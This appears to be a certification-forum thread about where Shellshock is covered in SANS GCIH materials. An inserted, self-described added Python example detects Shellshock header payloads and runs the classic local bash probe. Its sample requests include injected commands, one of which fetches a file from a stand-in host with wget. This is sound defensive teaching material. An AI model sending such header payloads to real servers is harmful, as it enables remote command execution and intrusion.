Shellshock/bash bug in GCIH books?

fabostrong Member Posts: 215
Going over my practice test and trying to find everything in the books that I got wrong. I can't find Shellshock, aka the bash bug, anywhere in the books. Anyone know what section it's in or where it should be, because I can't find it anywhere?

Thanks

Comments

  • [Deleted User] Senior Member Posts: 0
    Honestly, I haven't seen this in my GCIH books. Which edition of the manuals are you using? If you want to learn about ShellShock, just reference your CEH manuals. If you took CEHv9, it should be covered in there.
  • fabostrong Member Posts: 215
    [Deleted User] wrote: »
    Honestly, I haven't seen this in my GCIH books. Which edition of the manuals are you using? If you want to learn about ShellShock, just reference your CEH manuals. If you took CEHv9, it should be covered in there.

    Yeah, but it was on my GCIH practice test. Not sure what edition they are as I don't have them in front of me, but I took the class last month. Shellshock was on the practice test and is nowhere to be found in the book.
  • xxxkaliboyxxx Member Posts: 466
    Just google it and read up on it. I think I got a question on Shellshock in the actual test.
    Studying: GPEN
    Reading: SANS SEC560
    Upcoming Exam: GPEN
  • fabostrong Member Posts: 215
    xxxkaliboyxxx wrote: »
    Just google it and read up on it. I think I got a question on Shellshock in the actual test.

    Yeah, but one of the main things about GCIH or SANS courses is that the answers are supposed to be in the book.
  • stephens316 Member Posts: 203
    I don't think every answer is in the books; some are taken from other CBKs and put forth as just general IT security things. I'd comb your books though, then highlight it and put a tab on it. I will let you know what I find next month when I start the class.
    ______________
    Currently Studying: GPEN | GCNF | CISSP??
    Current Reading: CISSP | Counter Hack | Gray Hat Hacking
    Completed 2019: GCIH
    Free Reading: History Books
  • TechGromit Member Posts: 2,156
    They claim all the answers are in the books, but I got a question about Win XP on one of my exams that wasn't in the books, I looked after the exam and couldn't find it anywhere. MOST of the answers are in the books, but there always seem to be a few that are not.
    Still searching for the corner in a round room.
  • BillHoo Member Posts: 207
    According to the index of my books, current as of 2016:

    It was in Volume 4 (don't have the book handy, just my index), Pages 88 and 89. I think it was in a section regarding Applications or Web Applications Security, right after OWASP by a few pages.

    Notes:
    Shellshock - tricking the web server into taking commands - shellshock. Commands in Linux/Unix are separated by a ;
    Also - used to insert commands directly instead of a shell

    If you are using the newer books, the pages could be off by as many as 20-30 pages.

    Googling brings up a wiki (looks a little different from my notes based on the SANS books)
    https://en.wikipedia.org/wiki/Shellshock_(software_bug)

    Shellshock, also known as Bashdoor,[1] is a family of security bugs[2] in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.[3]
    Stéphane Chazelas contacted Bash's maintainer, Chet Ramey, on 12 September 2014[1] telling Ramey about his discovery of the original bug, which he called "Bashdoor". Working together with security experts, he soon had a patch as well.[1] The bug was assigned the CVE identifier CVE-2014-6271.[4] It was announced to the public on 24 September 2014 when Bash updates with the fix were ready for distribution.[5]
    The first bug causes Bash to unintentionally execute commands when the commands are concatenated to the end of function definitions stored in the values of environment variables.[1][6] Within days of the publication of this, intense scrutiny of the underlying design flaws discovered a variety of related vulnerabilities, (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187); which Ramey addressed with a series of further patches.[7][8]
    Attackers exploited Shellshock within hours of the initial disclosure by creating botnets of compromised computers to perform distributed denial-of-service attacks and vulnerability scanning.[9][10] Security companies recorded millions of attacks and probes related to the bug in the days following the disclosure.[11][12]
    Shellshock could potentially compromise millions of unpatched servers and other systems. Accordingly, it has been compared to the Heartbleed bug in its severity.[3][13]
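The Wikipedia passage above states the mechanism in one sentence: vulnerable bash ran whatever was appended after a function definition stored in an environment variable, and web servers were exposed because they hand request data to bash. The following is an added example, not part of this thread or of the SANS material, showing both halves of that: how CGI maps request headers into environment variable names (so a hostile User-Agent lands in HTTP_USER_AGENT), a detector that flags header values beginning with the "() {" function prefix and extracts the command appended after the body, and a probe that runs the widely circulated CVE-2014-6271 one-liner against the local bash. The sample requests and the 203.0.113.5 address are constructed; the function names are this example's own.

```python
import re
import subprocess
from typing import Dict, List, Optional

# Pre-fix bash treated any environment variable whose value began with the
# literal "() {" as a function definition and kept parsing past the closing
# brace, so a trailing "; command" ran on import.  The \s* lets this heuristic
# tolerate the spacing variants scanners used after disclosure.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")

# Everything after the function body: the part vulnerable bash would execute.
TRAILING_CMD_RE = re.compile(r"^\s*\(\)\s*\{.*?\}\s*;?\s*(.*)$", re.S)


def cgi_env_name(header: str) -> str:
    """Map an HTTP request header to its CGI environment variable (RFC 3875).

    Content-Type and Content-Length keep their own names; every other header
    becomes HTTP_<NAME> with '-' replaced by '_'.  This is the path by which
    attacker-controlled header text reaches the environment of a CGI script
    written in, or spawning, bash.
    """
    canon = header.strip().upper().replace("-", "_")
    if canon in ("CONTENT_TYPE", "CONTENT_LENGTH"):
        return canon
    return "HTTP_" + canon


def cgi_env_from_headers(headers: Dict[str, str]) -> Dict[str, str]:
    return {cgi_env_name(name): value for name, value in headers.items()}


def looks_like_shellshock(value: str) -> bool:
    return SHELLSHOCK_RE.match(value) is not None


def injected_command(value: str) -> Optional[str]:
    """Return the command appended after the function body, or None.

    Heuristic: stops at the first '}', so nested braces are not handled.
    """
    m = TRAILING_CMD_RE.match(value)
    if m is None:
        return None
    cmd = m.group(1).strip()
    return cmd or None


def scan_requests(requests: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Report every header value that vulnerable bash would have parsed as a function."""
    findings = []
    for idx, headers in enumerate(requests):
        for var, value in cgi_env_from_headers(headers).items():
            if looks_like_shellshock(value):
                findings.append({"request": idx, "env_var": var,
                                 "command": injected_command(value)})
    return findings


def probe_local_bash(bash: str = "bash") -> Optional[bool]:
    """Run the well-known CVE-2014-6271 check against a local bash binary.

    True if the appended command ran (vulnerable), False on a fixed bash,
    None if no bash could be executed.
    """
    env = {"PATH": "/usr/bin:/bin", "x": "() { :;}; echo vulnerable"}
    try:
        proc = subprocess.run([bash, "-c", "echo test"], env=env,
                              capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return "vulnerable" in proc.stdout


# Constructed sample requests (not real traffic).
SAMPLE_REQUESTS = [
    {"Host": "www.example.com", "User-Agent": "Mozilla/5.0", "Accept": "*/*"},
    # the classic probe: the payload lands in HTTP_USER_AGENT
    {"Host": "www.example.com", "User-Agent": "() { :;}; echo vulnerable"},
    # payloads in less-watched headers, each with a command after the body
    {"Host": "www.example.com",
     "Cookie": "() { :; }; /bin/bash -c 'id'",
     "Referer": "() { :;}; /usr/bin/wget http://203.0.113.5/x -O /tmp/x"},
]

if __name__ == "__main__":
    for f in scan_requests(SAMPLE_REQUESTS):
        print(f"request {f['request']}: {f['env_var']} would run: {f['command']}")
    print("local bash vulnerable:", probe_local_bash())
```

Run it as a script to see the three tainted header values and the result of the local probe; on any bash patched since September 2014 the probe prints False because the fixed bash only imports functions from specially named variables and leaves an ordinary variable holding "() {" alone.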
  • BillHoo Member Posts: 207
    Try finding Portswigger in the books too! (It's in there!)
  • fabostrong Member Posts: 215
    BillHoo wrote: »
    According to the index of my books, current as of 2016:

    It was in Volume 4 (don't have the book handy, just my index), Pages 88 and 89. I think it was in a section regarding Applications or Web Applications Security, right after OWASP by a few pages.

    You're the man. It's in the same book and on page 95. It's under Command Injection and a few pages after OWASP. It doesn't really explain it as well as I'd like but if I would've found it while taking the test, I think it would've given me enough information to get the right answer.
  • BillHoo Member Posts: 207
    I always reiterate the value of getting the SANS course to take the exam vs. challenging the exam.

    I think shellshock is a good example. Search the internet and you might be able to find pages of information, or even enough to write a small booklet or article on the subject.

    But when it comes to the exam, the test question would want to know a specific aspect of shellshock as explained in the book/class. Many times this is going to be maybe one sentence verbatim, or a defining concept. What is shellshock? It's a command injection where you use commands to trick the web server into taking commands. Pick the answer that's closest to the description.
  • xxxkaliboyxxx Member Posts: 466
    BillHoo wrote: »
    I always reiterate the value of getting the SANS course to take the exam vs. challenging the exam.

    I think shellshock is a good example. Search the internet and you might be able to find pages of information, or even enough to write a small booklet or article on the subject.

    But when it comes to the exam, the test question would want to know a specific aspect of shellshock as explained in the book/class. Many times this is going to be maybe one sentence verbatim, or a defining concept. What is shellshock? It's a command injection where you use commands to trick the web server into taking commands. Pick the answer that's closest to the description.

    I disagree respectfully. I believe what you are saying is just reinforcing book answers and not knowing about the actual subject. If you know the underlying subject, studied the history, etc., you won't need to know exactly where in the book an answer is, and if they change up the wording in the exam, no sweat, because you understand the subject, versus just memorizing the book answer.
    Studying: GPEN
    Reading: SANS SEC560
    Upcoming Exam: GPEN